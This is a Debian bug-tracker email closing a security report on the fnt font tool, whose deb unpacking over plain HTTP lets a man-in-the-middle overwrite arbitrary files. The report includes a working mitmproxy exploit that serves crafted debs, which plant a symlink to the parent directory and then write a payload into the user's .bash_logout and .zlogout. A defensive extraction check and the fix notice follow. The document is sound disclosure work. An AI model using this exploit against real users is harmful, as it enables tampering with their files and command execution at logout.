Your message dated Fri, 01 Dec 2023 21:34:14 +0000
with message-id <e1r9b9k-00fbcy...@fasolo.debian.org>
and subject line Bug#1043469: fixed in fnt 1.5-1
has caused the Debian Bug report #1043469,
regarding fnt: insecure deb unpacking
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1043469: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1043469
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: fnt
Version: 1.4.1-2
Severity: serious
Tags: security
https://www.gnu.org/software/tar/manual/html_node/Integrity.html says:
"When extracting from two or more untrusted archives, each one should be
extracted independently, into different empty directories. Otherwise,
the first archive could create a symbolic link into an area outside the
working directory, and the second one could follow the link and
overwrite data that is not under the working directory."
But fnt extracts every data.tar file into the same directory and does
not correctly remove files (potentially: malicious symlinks) after
extraction. Since fnt downloads debs over HTTP and does not verify their
integrity in any way, man-in-the-middle attackers could exploit this
vulnerability to overwrite arbitrary files.
I've attached a proof-of-concept exploit in the form of a mitmproxy
script.
--
Jakub Wilk
# encoding=UTF-8
# Copyright © 2023 Jakub Wilk <jw...@jwilk.net>
# SPDX-License-Identifier: MIT

# Usage:
#   mitmdump --listen-host 127.0.0.1 -s /path/to/fnt_mitm.py
# and then:
#   export http_proxy=http://127.0.0.1:8080/
#   fnt update
#   fnt install symbola
#   fnt install unifont
#   logout

import contextlib
import io
import os
import subprocess
import tarfile
import tempfile

try:
    from mitmproxy.http import Response as HTTPResponse  # mitmproxy >= 7.0
except ImportError:
    from mitmproxy.http import HTTPResponse  # mitmproxy >= 1.0

payload = b'''\
cowsay pwned
sleep inf
'''

debs = []

def mkar(members):
    # Pack the given files into an ar(1) archive, i.e. a .deb container.
    with tempfile.TemporaryDirectory() as tmpdir:
        ar_path = f'{tmpdir}/out.ar'
        subprocess.run(['ar', 'rcS', ar_path, *members], check=True)
        with open(ar_path, 'rb') as file:
            return file.read()

@contextlib.contextmanager
def tmpcwd():
    # Run the body inside a throw-away working directory.
    old_cwd = os.getcwd()
    try:
        with tempfile.TemporaryDirectory() as tmpdir:
            os.chdir(tmpdir)
            yield
    finally:
        os.chdir(old_cwd)

with tmpcwd():
    members = ['debian-binary', 'control.tar.xz', 'data.tar.xz']
    for member in members:
        with open(member, 'wb'):
            pass
    # First deb: data.tar contains only the symlink 'par' -> '..'.
    with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
        tinfo = tarfile.TarInfo('par')
        tinfo.type = tarfile.SYMTYPE
        tinfo.linkname = '..'
        tfile.addfile(tinfo)
    debs += [mkar(members)]
    # Second deb: regular files whose paths go through the symlink
    # left behind by the first extraction.
    with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
        for target in '.bash_logout', '.zlogout':
            tinfo = tarfile.TarInfo(f'par/{target}')
            tinfo.size = len(payload)
            tfile.addfile(tinfo, io.BytesIO(payload))
    debs += [mkar(members)]

class state:
    n = 0

def request(flow):
    # Serve the two crafted debs alternately in place of any .deb fnt requests.
    if flow.request.path.endswith('.deb'):
        flow.response = HTTPResponse.make(
            200,
            debs[state.n],
            {'Content-Type': 'application/vnd.debian.binary-package'}
        )
        state.n ^= 1

# vim:ts=4 sts=4 sw=4 et
--- End Message ---
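The extraction check the report describes as missing, as an added example (not code from the bug report or from fnt): every data.tar member is verified to stay inside its own fresh, empty destination directory before anything is written, so a symlink planted by one archive cannot redirect the files of the next. The sample archives, the `fnt-safe-`/`fnt-shared-` prefixes and all function names are constructed for this example.

```python
import io
import os
import tarfile
import tempfile

def member_is_safe(member, dest):
    """True only if extracting `member` cannot write outside `dest`."""
    dest = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest, member.name))
    if os.path.commonpath([dest, target]) != dest:
        return False  # absolute path, '..', or a symlink already on disk
    if member.issym() or member.islnk():
        base = os.path.dirname(target) if member.issym() else dest  # symlinks resolve relative to their own dir
        link = os.path.realpath(os.path.join(base, member.linkname))
        if os.path.commonpath([dest, link]) != dest:
            return False  # link would point outside the extraction root
    return member.isfile() or member.isdir() or member.issym() or member.islnk()

def rejected_members(tar_bytes, dest):
    """Names of members that must not be extracted into `dest`."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode='r:*') as tfile:
        return [m.name for m in tfile.getmembers() if not member_is_safe(m, dest)]

def extract_isolated(tar_bytes):
    """Unpack one archive into a fresh empty directory, or nothing at all."""
    dest = tempfile.mkdtemp(prefix='fnt-safe-')  # never reused for a second deb
    bad = rejected_members(tar_bytes, dest)
    if not bad:
        with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode='r:*') as tfile:
            # Python >= 3.12 also offers the stdlib 'data' filter as a second line of defence
            tfile.extractall(dest, **({'filter': 'data'} if hasattr(tarfile, 'data_filter') else {}))
    return dest, bad

def build_sample(symlink):
    """Constructed in-memory stand-ins for the two data.tar stages above."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w:gz') as tfile:
        if symlink:  # stage 1: 'par -> ..'
            info = tarfile.TarInfo('par')
            info.type, info.linkname = tarfile.SYMTYPE, '..'
            tfile.addfile(info)
        else:  # stage 2: a file whose path goes through 'par'
            data = b'echo constructed sample\n'
            info = tarfile.TarInfo('par/.bash_logout')
            info.size = len(data)
            tfile.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def shared_dir_outcome():
    # Stage 2 checked against a directory where stage 1's symlink already exists.
    dest = tempfile.mkdtemp(prefix='fnt-shared-')
    os.symlink('..', os.path.join(dest, 'par'))  # what stage 1 leaves behind
    return rejected_members(build_sample(False), dest)
```

Stage 1 is refused outright because the link target resolves above the destination; stage 2 is harmless in a fresh directory but is refused once the planted link exists, which is exactly the shared-directory case the report exploits.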
--- Begin Message ---
Source: fnt
Source-Version: 1.5-1
Done: Gürkan Myczko <t...@debian.org>
We believe that the bug you reported is fixed in the latest version of
fnt, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1043...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Gürkan Myczko <t...@debian.org> (supplier of updated fnt package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
Format: 1.8
Date: Fri, 01 Dec 2023 21:04:13 +0100
Source: fnt
Architecture: source
Version: 1.5-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Fonts Task Force <debian-fo...@lists.debian.org>
Changed-By: Gürkan Myczko <t...@debian.org>
Closes: 1043469
Changes:
fnt (1.5-1) unstable; urgency=medium
.
* New upstream version. (Closes: #1043469)
* debian/patches: dropped.
--- End Message ---